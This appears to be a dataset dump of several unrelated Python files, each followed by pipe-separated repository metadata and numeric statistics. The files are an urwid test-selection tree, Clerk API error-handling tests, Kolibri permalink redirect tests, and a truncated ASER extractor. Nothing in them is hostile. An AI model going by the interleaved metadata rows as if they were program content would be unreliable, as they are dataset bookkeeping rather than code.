        self._w.focus_attr = "focus %s" % outcome
        self._w.attr = outcome
        if self.get_node().flagged:
            self.selected_w.set_text("[x]")
        else:
            self.selected_w.set_text("[ ]")
    def get_display_text(self):
        # The node's key is the test's display name.
        return self.get_node().get_key()
class SingleTestNode(urwid.TreeNode):
    """Leaf tree node for one test; mirrors its selection state into the
    module-level SELECTED_TEST set via on_flagged()."""

    def __init__(self, *args, flagged=False, test_suite=None, **kwargs):
        super().__init__(*args, **kwargs)
        self.flagged = flagged
        self.test_suite = test_suite
        # Identity used in SELECTED_TEST: (suite, test key).
        self.test_id = (self.test_suite, self._key)

    def load_widget(self):
        return SingleTestWidget(self)

    def toggle_flag(self):
        self.set_flag(not self.flagged)

    def set_flag(self, flag):
        """Set the flag, repaint the row, sync the global set, and let the
        parent recompute its aggregate flag."""
        self.flagged = flag
        self.get_widget().update_w()
        on_flagged(self.test_id, flag)
        self.get_parent().check_flag()

    def check_flag(self):
        # Recompute flagged purely from SELECTED_TEST membership.
        self.flagged = self.test_id in SELECTED_TEST

    def refresh(self):
        self.check_flag()
        self.get_widget().update_w()
class TestFileWidget(urwid.TreeWidget):
    """Expandable row for a test file with a tri-state selection box:
    "[x]" all child tests selected, "[~]" some, "[ ]" none."""
    # Custom expand/collapse markers replacing urwid's defaults.
    unexpanded_icon = urwid.SelectableIcon("▹", 0)
    expanded_icon = urwid.SelectableIcon("▿", 0)
    def __init__(self, *args, **kwargs):
        # The checkbox Text must exist before super().__init__ builds the
        # inner widget through load_inner_widget().
        self.selected_w = urwid.Text("[ ]")
        super().__init__(*args, **kwargs)
        # insert an extra AttrWrap for our own use
        self._w = urwid.AttrWrap(self._w, None)
        self._w.attr = "body"
        self._w.focus_attr = "focus"
        self.update_w()
        # Start expanded so the file's tests are visible immediately.
        self.expanded = True
        self.update_expanded_icon()
    def load_inner_widget(self):
        # Fixed 3-column checkbox, then the file name, one space apart.
        main_w = urwid.Text(self.get_display_text())
        return urwid.Columns([("fixed", 3, self.selected_w), main_w], dividechars=1)
    def get_display_text(self):
        # The node's key is the file's display name.
        return self.get_node().get_key()
    def selectable(self):
        # Row can take focus so keypress() receives input.
        return True
    def keypress(self, size, key):
        """allow subclasses to intercept keystrokes"""
        key = self.__super.keypress(size, key)
        if key:
            key = self.unhandled_keys(size, key)
        return key
    def unhandled_keys(self, size, key):
        """
        Override this method to intercept keystrokes in subclasses.
        Default behavior: Toggle flagged on space, ignore other keys.
        """
        if key == " ":
            self.get_node().toggle_flag()
        else:
            return key
    def update_w(self):
        """Update the attributes of self.widget based on self.flagged.

        Renders the tri-state checkbox from the node's all_flagged /
        any_flagged aggregates.
        """
        node = self.get_node()
        if node.flagged:
            if node.all_flagged:
                icon = "x"
            elif node.any_flagged:
                icon = "~"
            else:
                # flagged without any child flagged is an inconsistent state
                raise ValueError()
            self.selected_w.set_text("[%s]" % icon)
        else:
            self.selected_w.set_text("[ ]")
class TestFileNode(urwid.ParentNode):
    """Parent node for a test file; aggregates its children's selection
    state into flagged / all_flagged / any_flagged."""
    def __init__(self, *args, flagged=False, test_suite=None, **kwargs):
        super().__init__(*args, **kwargs)
        self.flagged = flagged
        self.test_suite = test_suite
        # Aggregates recomputed by check_flag().
        self.all_flagged = False
        self.any_flagged = False
    def load_widget(self):
        return TestFileWidget(self)
    def load_child_keys(self):
        # Children are this file's test names, sorted for stable display.
        data = self.get_value()
        return sorted(data.get_tests_name(test_file=self._key))
    def set_flag(self, flag):
        """Propagate the flag down to every child, then repaint and let the
        parent recompute its own aggregate."""
        self.flagged = flag
        for child_key in self.get_child_keys():
            child = self.get_child_node(child_key)
            child.set_flag(flag)
        self.get_widget().update_w()
        if hasattr(self.get_parent(), "check_flag"):
            self.get_parent().check_flag()
    def check_flag(self):
        """Recompute all_flagged/any_flagged from SELECTED_TEST membership
        of this file's test ids, then repaint and bubble upward.

        NOTE(review): ids are built here as (self.get_value(), test) while
        SingleTestNode registers (self.test_suite, key) — confirm both refer
        to the same suite object, otherwise the set operations never match.
        """
        data = self.get_value()
        tests = data.get_tests_name(test_file=self._key)
        stests = set()
        for test in tests:
            stests.add((self.get_value(), test))
        self.all_flagged = stests.issubset(SELECTED_TEST)
        self.any_flagged = not stests.isdisjoint(SELECTED_TEST)
        if self.all_flagged or self.any_flagged:
            self.flagged = True
            self.get_widget().update_w()
            if hasattr(self.get_parent(), "check_flag"):
                self.get_parent().check_flag()
        if not self.any_flagged:
            self.flagged = False
            self.get_widget().update_w()
            if hasattr(self.get_parent(), "check_flag"):
                self.get_parent().check_flag()
    def toggle_flag(self):
        self.set_flag(not self.flagged)
    def load_child_node(self, key):
        # Truthy entries are tests (leaf nodes); falsy ones become another
        # TestFileNode level.
        data = self.get_value()
        test = data[key]
        if test:
            child_class = SingleTestNode
        else:
            child_class = self.__class__
        return child_class(
            data,
            parent=self,
            key=key,
            depth=self.get_depth() + 1,
            flagged=self.flagged,
            test_suite=self.get_value(),
        )
    def refresh(self):
        # Drop the cached child keys so they are re-read, then refresh the
        # whole subtree.
        self._child_keys = None
        self.check_flag()
        for child_key in self.get_child_keys():
            child = self.get_child_node(child_key)
            child.refresh()
class TestSuiteWidget(urwid.TreeWidget):
    """Expandable row for a whole suite with a tri-state selection box.

    NOTE(review): line-for-line identical to TestFileWidget — candidate for
    a shared base class."""
    # Custom expand/collapse markers replacing urwid's defaults.
    unexpanded_icon = urwid.SelectableIcon("▹", 0)
    expanded_icon = urwid.SelectableIcon("▿", 0)
    def __init__(self, *args, **kwargs):
        # The checkbox Text must exist before super().__init__ builds the
        # inner widget through load_inner_widget().
        self.selected_w = urwid.Text("[ ]")
        super().__init__(*args, **kwargs)
        # insert an extra AttrWrap for our own use
        self._w = urwid.AttrWrap(self._w, None)
        self._w.attr = "body"
        self._w.focus_attr = "focus"
        self.update_w()
        # Start expanded so the suite's files are visible immediately.
        self.expanded = True
        self.update_expanded_icon()
    def load_inner_widget(self):
        # Fixed 3-column checkbox, then the suite name, one space apart.
        main_w = urwid.Text(self.get_display_text())
        return urwid.Columns([("fixed", 3, self.selected_w), main_w], dividechars=1)
    def get_display_text(self):
        # The node's key is the suite's display name.
        return self.get_node().get_key()
    def selectable(self):
        # Row can take focus so keypress() receives input.
        return True
    def keypress(self, size, key):
        """allow subclasses to intercept keystrokes"""
        key = self.__super.keypress(size, key)
        if key:
            key = self.unhandled_keys(size, key)
        return key
    def unhandled_keys(self, size, key):
        """
        Override this method to intercept keystrokes in subclasses.
        Default behavior: Toggle flagged on space, ignore other keys.
        """
        if key == " ":
            self.get_node().toggle_flag()
        else:
            return key
    def update_w(self):
        """Update the attributes of self.widget based on self.flagged.

        Renders the tri-state checkbox from the node's all_flagged /
        any_flagged aggregates.
        """
        node = self.get_node()
        if node.flagged:
            if node.all_flagged:
                icon = "x"
            elif node.any_flagged:
                icon = "~"
            else:
                # flagged without any child flagged is an inconsistent state
                raise ValueError()
            self.selected_w.set_text("[%s]" % icon)
        else:
            self.selected_w.set_text("[ ]")
class TestSuiteNode(urwid.ParentNode):
    """Parent node for a suite; children are TestFileNode per test file.
    Aggregates selection state like TestFileNode but over every test in
    the suite."""
    def __init__(self, *args, flagged=False, **kwargs):
        super().__init__(*args, **kwargs)
        self.flagged = flagged
        # Aggregates recomputed by check_flag().
        self.all_flagged = False
        self.any_flagged = False
    def load_widget(self):
        return TestSuiteWidget(self)
    def load_child_keys(self):
        # Children are the suite's test files, sorted for stable display.
        data = self.get_value()
        return sorted(data.get_test_files())
    def set_flag(self, flag):
        """Propagate the flag down to every child, then repaint and let the
        parent recompute its own aggregate."""
        self.flagged = flag
        for child_key in self.get_child_keys():
            child = self.get_child_node(child_key)
            child.set_flag(flag)
        self.get_widget().update_w()
        if hasattr(self.get_parent(), "check_flag"):
            self.get_parent().check_flag()
    def check_flag(self):
        """Recompute all_flagged/any_flagged from SELECTED_TEST membership
        of every test id in the suite, then repaint and bubble upward.

        NOTE(review): ids are built here as (self.get_value(), test) while
        SingleTestNode registers (self.test_suite, key) — confirm both refer
        to the same suite object, otherwise the set operations never match.
        """
        data = self.get_value()
        tests = data.get_tests_name()
        stests = set()
        for test in tests:
            stests.add((self.get_value(), test))
        self.all_flagged = stests.issubset(SELECTED_TEST)
        self.any_flagged = not stests.isdisjoint(SELECTED_TEST)
        if self.all_flagged or self.any_flagged:
            self.flagged = True
            self.get_widget().update_w()
            if hasattr(self.get_parent(), "check_flag"):
                self.get_parent().check_flag()
        if not self.any_flagged:
            self.flagged = False
            self.get_widget().update_w()
            if hasattr(self.get_parent(), "check_flag"):
                self.get_parent().check_flag()
    def toggle_flag(self):
        self.set_flag(not self.flagged)
    def load_child_node(self, key):
        data = self.get_value()
        child_class = TestFileNode
        return child_class(
            data, parent=self, key=key, depth=self.get_depth() + 1, flagged=self.flagged
        )
    def refresh(self):
        # signals.emit_signal(self.get_widget(), "modified")
        # Drop the cached child keys so they are re-read, then refresh the
        # whole subtree.
        self._child_keys = None
        self.check_flag()
        for child_key in self.get_child_keys():
            child = self.get_child_node(child_key)
            child.refresh()
class RootTreeWidget(urwid.TreeWidget):
    """Display widget for the root node; its caption is fixed."""

    def get_display_text(self):
        # The root row is always labelled "Tests".
        return "Tests"
class RootParentNode(urwid.ParentNode):
    """Root of the test tree: one TestSuiteNode child per test suite."""

    def load_widget(self):
        return RootTreeWidget(self)

    def load_child_keys(self):
        return list(self.get_value().get_test_suites())

    def load_child_node(self, key):
        value = self.get_value()
        return TestSuiteNode(
            value.suites[key], parent=self, key=key, depth=self.get_depth() + 1
        )

    def refresh(self):
        # Invalidate the cached child keys, then refresh each child in turn.
        self._child_keys = None
        for key in self.get_child_keys():
            self.get_child_node(key).refresh()
| 28.226872
| 88
| 0.591182
| 1,559
| 12,815
| 4.62925
| 0.117383
| 0.059166
| 0.023417
| 0.032423
| 0.75918
| 0.747818
| 0.730913
| 0.726895
| 0.709436
| 0.698767
| 0
| 0.002619
| 0.284822
| 12,815
| 453
| 89
| 28.289183
| 0.784397
| 0.07936
| 0
| 0.729032
| 0
| 0
| 0.061744
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.164516
| false
| 0.006452
| 0.012903
| 0.035484
| 0.303226
| 0.003226
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
90bd0f7b8b08db4cb8e94533fd4b340cb7aa38da
| 26
|
py
|
Python
|
opt/__init__.py
|
hansheng0512/LateTemporalModeling3DCNN
|
71c1d3fae9781c55059f0518e0b39781a535e153
|
[
"MIT"
] | 144
|
2020-08-06T02:18:49.000Z
|
2022-03-16T23:03:56.000Z
|
opt/__init__.py
|
hansheng0512/LateTemporalModeling3DCNN
|
71c1d3fae9781c55059f0518e0b39781a535e153
|
[
"MIT"
] | 26
|
2020-08-12T01:07:48.000Z
|
2022-01-11T16:28:08.000Z
|
opt/__init__.py
|
hansheng0512/LateTemporalModeling3DCNN
|
71c1d3fae9781c55059f0518e0b39781a535e153
|
[
"MIT"
] | 55
|
2020-08-13T03:00:17.000Z
|
2022-03-28T06:38:08.000Z
|
from .AdamW import AdamW
| 8.666667
| 24
| 0.769231
| 4
| 26
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192308
| 26
| 2
| 25
| 13
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
90deeb453f569ec9ed42914674d68873f513d8f1
| 3,694
|
py
|
Python
|
tests/test_client.py
|
tizz98/clerk-sdk-python
|
32a2e243aa8a8d92ca4f3dab68b36eef5aa040d3
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
tizz98/clerk-sdk-python
|
32a2e243aa8a8d92ca4f3dab68b36eef5aa040d3
|
[
"MIT"
] | null | null | null |
tests/test_client.py
|
tizz98/clerk-sdk-python
|
32a2e243aa8a8d92ca4f3dab68b36eef5aa040d3
|
[
"MIT"
] | null | null | null |
import pytest
from clerk import errors, types
@pytest.mark.asyncio
class TestAPIErrorHandling:
    """Every service method must surface a server-side 400 as a
    ClerkAPIException carrying the request context and decoded API errors."""

    def _check_error(self, e: errors.ClerkAPIException, err):
        # The exception exposes the HTTP context plus the parsed error tuple.
        assert e.status == 400
        assert e.method is not None
        assert e.url is not None
        assert e.api_errors == (err,)

    @staticmethod
    def _expect_400(httpserver, uri, method, err):
        """Register *uri* to answer with a 400 JSON error payload.

        method=None registers a handler that matches any HTTP method."""
        if method is None:
            handler = httpserver.expect_request(uri)
        else:
            handler = httpserver.expect_request(uri, method)
        handler.respond_with_json({"errors": [err.dict()]}, status=400)

    async def _assert_error(self, coro, err):
        """Await *coro*, expect ClerkAPIException, and validate its payload."""
        with pytest.raises(errors.ClerkAPIException) as e:
            await coro
        self._check_error(e.value, err)

    async def test_sessions_service_handles_errors(self, client, httpserver, server_400_error):
        self._expect_400(httpserver, "/sessions/", "GET", server_400_error)
        self._expect_400(httpserver, "/sessions/123/", "GET", server_400_error)
        self._expect_400(httpserver, "/sessions/123/revoke/", "POST", server_400_error)
        self._expect_400(httpserver, "/sessions/123/verify/", "POST", server_400_error)

        await self._assert_error(client.session.list(), server_400_error)
        await self._assert_error(client.session.get("123"), server_400_error)
        await self._assert_error(client.session.revoke("123"), server_400_error)
        await self._assert_error(client.session.verify("123", "x"), server_400_error)

    async def test_users_service_handles_errors(self, client, httpserver, server_400_error):
        self._expect_400(httpserver, "/users/", "GET", server_400_error)
        # No method filter: get/delete/update all hit this one handler.
        self._expect_400(httpserver, "/users/123/", None, server_400_error)

        await self._assert_error(client.users.list(), server_400_error)
        await self._assert_error(client.users.get("123"), server_400_error)
        await self._assert_error(client.users.delete("123"), server_400_error)
        await self._assert_error(
            client.users.update("123", types.UpdateUserRequest()), server_400_error
        )

    async def test_clients_service_handles_errors(self, client, httpserver, server_400_error):
        self._expect_400(httpserver, "/clients/", "GET", server_400_error)
        self._expect_400(httpserver, "/clients/123/", "GET", server_400_error)
        self._expect_400(httpserver, "/clients/verify/", "POST", server_400_error)

        await self._assert_error(client.clients.list(), server_400_error)
        await self._assert_error(client.clients.get("123"), server_400_error)
        await self._assert_error(client.clients.verify("token"), server_400_error)
| 36.574257
| 95
| 0.654034
| 442
| 3,694
| 5.217195
| 0.131222
| 0.089766
| 0.139636
| 0.104944
| 0.870772
| 0.856895
| 0.856895
| 0.856895
| 0.842151
| 0.842151
| 0
| 0.047137
| 0.224689
| 3,694
| 100
| 96
| 36.94
| 0.758031
| 0
| 0
| 0.430556
| 0
| 0
| 0.062263
| 0.01137
| 0
| 0
| 0
| 0
| 0.055556
| 1
| 0.013889
| false
| 0
| 0.027778
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
294b05a0c139fd61f48237032e1f5ce23081086c
| 5,260
|
py
|
Python
|
kolibri/core/content/test/test_redirectcontent.py
|
MBKayro/kolibri
|
0a38a5fb665503cf8f848b2f65938e73bfaa5989
|
[
"MIT"
] | 545
|
2016-01-19T19:26:55.000Z
|
2022-03-20T00:13:04.000Z
|
kolibri/core/content/test/test_redirectcontent.py
|
MBKayro/kolibri
|
0a38a5fb665503cf8f848b2f65938e73bfaa5989
|
[
"MIT"
] | 8,329
|
2016-01-19T19:32:02.000Z
|
2022-03-31T21:23:12.000Z
|
kolibri/core/content/test/test_redirectcontent.py
|
MBKayro/kolibri
|
0a38a5fb665503cf8f848b2f65938e73bfaa5989
|
[
"MIT"
] | 493
|
2016-01-19T19:26:48.000Z
|
2022-03-28T14:35:05.000Z
|
import uuid
from django.core.urlresolvers import reverse
from django.test import TestCase
from mock import patch
from six.moves.urllib.parse import urlencode
from kolibri.core.content.models import ContentNode
class RedirectContentTestCase(TestCase):
    """
    Testcase for the contentpermalink (viewcontent) redirect endpoint.
    """

    fixtures = ["content_test.json"]
    the_channel_id = "6199dde695db4ee4ab392222d5af1e5c"

    def _get_url(self, **kwargs):
        """Build the permalink URL; only non-None kwargs become query params."""
        url = reverse("kolibri:core:contentpermalink")
        if any(kwargs.values()):
            url += "?"
            url += urlencode({k: v for k, v in kwargs.items() if v is not None})
        return url

    def _get(self, **kwargs):
        # One GET against the permalink endpoint with the given query params.
        return self.client.get(self._get_url(**kwargs))

    def _assert_redirects_to_node(self, node_id, **kwargs):
        """The endpoint must 302-redirect to a URL mentioning *node_id*."""
        response = self._get(**kwargs)
        self.assertEqual(response.status_code, 302)
        # This is true for our default learn urls for now.
        self.assertIn(node_id, response.url)

    def _assert_not_found(self, **kwargs):
        response = self._get(**kwargs)
        self.assertEqual(response.status_code, 404)

    def test_no_params_404(self):
        self._assert_not_found()

    def test_node_id_only_valid(self):
        node_id = ContentNode.objects.first().id
        self._assert_redirects_to_node(node_id, node_id=node_id)

    def test_node_id_only_invalid(self):
        self._assert_not_found(node_id="rubbish")

    def test_node_id_and_content_id_valid(self):
        node = ContentNode.objects.first()
        self._assert_redirects_to_node(
            node.id, node_id=node.id, content_id=node.content_id
        )

    def test_node_id_and_content_id_and_channel_id_valid(self):
        node = ContentNode.objects.first()
        self._assert_redirects_to_node(
            node.id,
            node_id=node.id,
            content_id=node.content_id,
            channel_id=node.channel_id,
        )

    def test_node_id_missing_and_content_id_and_channel_id_valid(self):
        # Unknown node_id, but content_id + channel_id identify a unique node.
        node = ContentNode.objects.first()
        self._assert_redirects_to_node(
            node.id,
            node_id=uuid.uuid4().hex,
            content_id=node.content_id,
            channel_id=node.channel_id,
        )

    def test_node_id_missing_and_content_id_valid_and_channel_id_missing(self):
        node = ContentNode.objects.first()
        self._assert_redirects_to_node(
            node.id,
            node_id=uuid.uuid4().hex,
            content_id=node.content_id,
            channel_id=uuid.uuid4().hex,
        )

    def test_node_id_missing_and_content_id_missing_and_channel_id_missing(self):
        self._assert_not_found(
            node_id=uuid.uuid4().hex,
            content_id=uuid.uuid4().hex,
            channel_id=uuid.uuid4().hex,
        )

    def test_node_id_invalid_and_content_id_and_channel_id_valid(self):
        node = ContentNode.objects.first()
        self._assert_redirects_to_node(
            node.id,
            node_id="rubbish",
            content_id=node.content_id,
            channel_id=node.channel_id,
        )

    def test_node_id_invalid_and_content_id_valid_and_channel_id_invalid(self):
        node = ContentNode.objects.first()
        self._assert_redirects_to_node(
            node.id, node_id="rubbish", content_id=node.content_id, channel_id="rubbish"
        )

    def test_node_id_invalid_and_content_id_invalid_and_channel_id_invalid(self):
        self._assert_not_found(
            node_id="rubbish", content_id="rubbish", channel_id="rubbish"
        )

    def test_node_id_only_valid_no_hooks_404(self):
        # With no registered display hooks there is nowhere to redirect to.
        node_id = ContentNode.objects.first().id
        with patch("kolibri.core.content.views.ContentNodeDisplayHook") as hook_mock:
            hook_mock.registered_hooks.return_value = []
            self._assert_not_found(node_id=node_id)
| 38.394161
| 88
| 0.65076
| 686
| 5,260
| 4.72449
| 0.129738
| 0.064795
| 0.066646
| 0.077754
| 0.814872
| 0.799753
| 0.798828
| 0.763653
| 0.746375
| 0.746375
| 0
| 0.017015
| 0.262548
| 5,260
| 136
| 89
| 38.676471
| 0.81851
| 0.111217
| 0
| 0.5
| 0
| 0
| 0.038073
| 0.023661
| 0
| 0
| 0
| 0
| 0.182692
| 1
| 0.125
| false
| 0
| 0.057692
| 0
| 0.221154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
2950e2d6496ab5c04db14e9a7b1fdb1a9afd9f23
| 56,354
|
py
|
Python
|
aser/extract/aser_extractor.py
|
DDoublu/ASER
|
93f91a6d4797fdfbb0dc3051acae367fe85bc5cb
|
[
"MIT"
] | null | null | null |
aser/extract/aser_extractor.py
|
DDoublu/ASER
|
93f91a6d4797fdfbb0dc3051acae367fe85bc5cb
|
[
"MIT"
] | null | null | null |
aser/extract/aser_extractor.py
|
DDoublu/ASER
|
93f91a6d4797fdfbb0dc3051acae367fe85bc5cb
|
[
"MIT"
] | null | null | null |
from copy import copy, deepcopy
from itertools import chain
from .eventuality_extractor import SeedRuleEventualityExtractor, DiscourseEventualityExtractor
from .relation_extractor import SeedRuleRelationExtractor, DiscourseRelationExtractor
from .utils import parse_sentense_with_stanford, get_corenlp_client
from .utils import ANNOTATORS
class BaseASERExtractor(object):
""" Base ASER Extractor to extract both eventualities and relations.
It includes an instance of `BaseEventualityExtractor` and an instance of `BaseRelationExtractor`.
"""
def __init__(self, corenlp_path="", corenlp_port=0, **kw):
    """Store shared CoreNLP settings; concrete extractors are set by subclasses.

    :param corenlp_path: path to a Stanford CoreNLP installation, e.g.,
        /home/xliucr/stanford-corenlp-3.9.2
    :type corenlp_path: str (default = "")
    :param corenlp_port: CoreNLP server port, e.g., 9000
    :type corenlp_port: int (default = 0)
    :param kw: other parameters; "annotators" overrides the default list
    :type kw: Dict[str, object]
    """
    self.corenlp_path = corenlp_path
    self.corenlp_port = corenlp_port
    self.annotators = kw.get("annotators", list(ANNOTATORS))
    # Probe the client once and remember whether the server is externally
    # managed, so close() knows whether it may stop it. ("externel" is a
    # historical misspelling kept for interface compatibility.)
    _, self.is_externel_corenlp = get_corenlp_client(
        corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port
    )
    self.eventuality_extractor = None
    self.relation_extractor = None
def close(self):
    """Shut down the CoreNLP client (only if this object owns it) and close
    both sub-extractors if they exist."""
    if not self.is_externel_corenlp:
        client, _ = get_corenlp_client(
            corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port
        )
        client.stop()
    if self.eventuality_extractor:
        self.eventuality_extractor.close()
    if self.relation_extractor:
        self.relation_extractor.close()
def __del__(self):
    # Best-effort cleanup when the extractor is garbage collected.
    self.close()
def parse_text(self, text, annotators=None):
    """Annotate *text* with CoreNLP and return one dict per sentence.

    :param text: a raw text
    :type text: str
    :param annotators: annotators for corenlp, please refer to
        https://stanfordnlp.github.io/CoreNLP/annotators.html;
        defaults to the annotators configured on this extractor
    :type annotators: Union[List, None] (default = None)
    :return: the parsed sentences, each a dict with keys such as
        "dependencies", "lemmas", "mentions", "ners", "parse",
        "pos_tags", "text", and "tokens"
    :rtype: List[Dict[str, object]]
    """
    if annotators is None:
        annotators = self.annotators
    client, _ = get_corenlp_client(
        corenlp_path=self.corenlp_path,
        corenlp_port=self.corenlp_port,
        annotators=annotators,
    )
    # NOTE(review): the parse itself is always run with self.annotators,
    # not the per-call *annotators* used to obtain the client — preserved
    # as-is; confirm whether passing *annotators* here was intended.
    return parse_sentense_with_stanford(text, client, self.annotators)
def extract_eventualities_from_parsed_result(self, parsed_result, output_format="Eventuality", in_order=True, **kw):
    """Extract eventualities from a CoreNLP parsed result.

    :param parsed_result: sentences as returned by :meth:`parse_text`
    :type parsed_result: List[Dict[str, object]]
    :param output_format: which format to return, "Eventuality" or "json"
    :type output_format: str (default = "Eventuality")
    :param in_order: whether the returned order follows the input token order
    :type in_order: bool (default = True)
    :param kw: other parameters, forwarded to the eventuality extractor
    :type kw: Dict[str, object]
    :return: the extracted eventualities, grouped per sentence when in_order
    :raises ValueError: if *output_format* is not supported
    """
    if output_format not in ("Eventuality", "json"):
        raise ValueError(
            "Error: extract_eventualities_from_parsed_result only supports Eventuality or json."
        )
    return self.eventuality_extractor.extract_from_parsed_result(
        parsed_result, output_format=output_format, in_order=in_order, **kw
    )
def extract_eventualities_from_text(self, text, output_format="Eventuality", in_order=True, annotators=None, **kw):
    """Parse *text* with CoreNLP, then extract its eventualities.

    :param text: a raw text
    :type text: str
    :param output_format: which format to return, "Eventuality" or "json"
    :type output_format: str (default = "Eventuality")
    :param in_order: whether the returned order follows the input token order
    :type in_order: bool (default = True)
    :param annotators: annotators for corenlp (see :meth:`parse_text`)
    :type annotators: Union[List, None] (default = None)
    :param kw: other parameters, forwarded to the eventuality extractor
    :type kw: Dict[str, object]
    :return: the extracted eventualities
    :raises NotImplementedError: if *output_format* is not supported
    """
    if output_format not in ("Eventuality", "json"):
        raise NotImplementedError("Error: extract_eventualities_from_text only supports Eventuality or json.")
    parsed = self.parse_text(text, annotators=annotators)
    return self.extract_eventualities_from_parsed_result(
        parsed, output_format=output_format, in_order=in_order, **kw
    )
def extract_relations_from_parsed_result(
    self, parsed_result, para_eventualities, output_format="Relation", in_order=True, **kw
):
    """Extract relations between the given eventualities of one paragraph.

    :param parsed_result: sentences as returned by :meth:`parse_text`
    :type parsed_result: List[Dict[str, object]]
    :param para_eventualities: eventualities of the paragraph
    :type para_eventualities: List[aser.eventuality.Eventuality]
    :param output_format: which format to return, "Relation" or "triplet"
    :type output_format: str (default = "Relation")
    :param in_order: whether the returned order follows the input token order
    :type in_order: bool (default = True)
    :param kw: other parameters, forwarded to the relation extractor
    :type kw: Dict[str, object]
    :return: the extracted relations
    :raises NotImplementedError: if *output_format* is not supported
    """
    if output_format not in ("Relation", "triplet"):
        raise NotImplementedError("Error: extract_relations_from_parsed_result only supports Relation or triplet.")
    return self.relation_extractor.extract_from_parsed_result(
        parsed_result, para_eventualities, output_format=output_format, in_order=in_order, **kw
    )
def extract_relations_from_text(self, text, output_format="Relation", in_order=True, annotators=None, **kw):
    """Parse *text*, extract its eventualities, then relations between them.

    :param text: a raw text
    :type text: str
    :param output_format: which format to return, "Relation" or "triplet"
    :type output_format: str (default = "Relation")
    :param in_order: whether the returned order follows the input token order
    :type in_order: bool (default = True)
    :param annotators: annotators for corenlp (see :meth:`parse_text`)
    :type annotators: Union[List, None] (default = None)
    :param kw: other parameters, forwarded to the relation extractor
    :type kw: Dict[str, object]
    :return: the extracted relations
    :raises NotImplementedError: if *output_format* is not supported
    """
    if output_format not in ("Relation", "triplet"):
        raise NotImplementedError("Error: extract_relations_from_text only supports Relation or triplet.")
    parsed = self.parse_text(text, annotators=annotators)
    eventualities = self.extract_eventualities_from_parsed_result(parsed)
    return self.extract_relations_from_parsed_result(
        parsed, eventualities, output_format=output_format, in_order=in_order, **kw
    )
def extract_from_parsed_result(
    self,
    parsed_result,
    eventuality_output_format="Eventuality",
    relation_output_format="Relation",
    in_order=True,
    **kw
):
    """Extract both eventualities and relations from a parsed result.

    :param parsed_result: parsed sentences, or a single sentence dict
    :type parsed_result: Union[List[Dict[str, object]], Dict[str, object]]
    :param eventuality_output_format: "Eventuality" or "json"
    :type eventuality_output_format: str (default = "Eventuality")
    :param relation_output_format: "Relation" or "triplet"
    :type relation_output_format: str (default = "Relation")
    :param in_order: if True, keep per-sentence grouping; otherwise merge
        duplicates (by eid / rid) and return flat, sorted collections
    :type in_order: bool (default = True)
    :param kw: other parameters, forwarded to both extractors
    :type kw: Dict[str, object]
    :return: a (eventualities, relations) pair
    :raises NotImplementedError: on unsupported formats or input types
    """
    if eventuality_output_format not in ("Eventuality", "json"):
        raise NotImplementedError("Error: extract_eventualities only supports Eventuality or json.")
    if relation_output_format not in ("Relation", "triplet"):
        raise NotImplementedError("Error: extract_relations only supports Relation or triplet.")
    if not isinstance(parsed_result, (list, tuple, dict)):
        raise NotImplementedError
    # A bare dict means a single sentence; normalize to a one-element list.
    is_single_sent = isinstance(parsed_result, dict)
    if is_single_sent:
        parsed_result = [parsed_result]

    para_eventualities = self.extract_eventualities_from_parsed_result(
        parsed_result, output_format="Eventuality", in_order=True, **kw
    )
    para_relations = self.extract_relations_from_parsed_result(
        parsed_result, para_eventualities, output_format="Relation", in_order=True, **kw
    )

    if in_order:
        if eventuality_output_format == "json":
            para_eventualities = [
                [eventuality.encode(encoding=None) for eventuality in sent_eventualities]
                for sent_eventualities in para_eventualities
            ]
        if relation_output_format == "triplet":
            # NOTE(review): this branch calls relation.to_triplet() while the
            # merged branch below calls relation.to_triplets() — one of the
            # two names is probably wrong; preserved as-is.
            para_relations = [
                list(chain.from_iterable(relation.to_triplet() for relation in sent_relations))
                for sent_relations in para_relations
            ]
        if is_single_sent:
            return para_eventualities[0], para_relations[0]
        return para_eventualities, para_relations

    # Merge duplicate eventualities across sentences by eid.
    eid2eventuality = dict()
    for eventuality in chain.from_iterable(para_eventualities):
        existing = eid2eventuality.get(eventuality.eid)
        if existing is None:
            eid2eventuality[eventuality.eid] = deepcopy(eventuality)
        else:
            existing.update(eventuality)
    if eventuality_output_format == "Eventuality":
        eventualities = sorted(eid2eventuality.values(), key=lambda e: e.eid)
    elif eventuality_output_format == "json":
        eventualities = sorted(
            (eventuality.encode(encoding=None) for eventuality in eid2eventuality.values()),
            key=lambda e: e["eid"],
        )

    # Merge duplicate relations by rid.
    rid2relation = dict()
    for relation in chain.from_iterable(para_relations):
        existing = rid2relation.get(relation.rid)
        if existing is None:
            rid2relation[relation.rid] = deepcopy(relation)
        else:
            existing.update(relation)
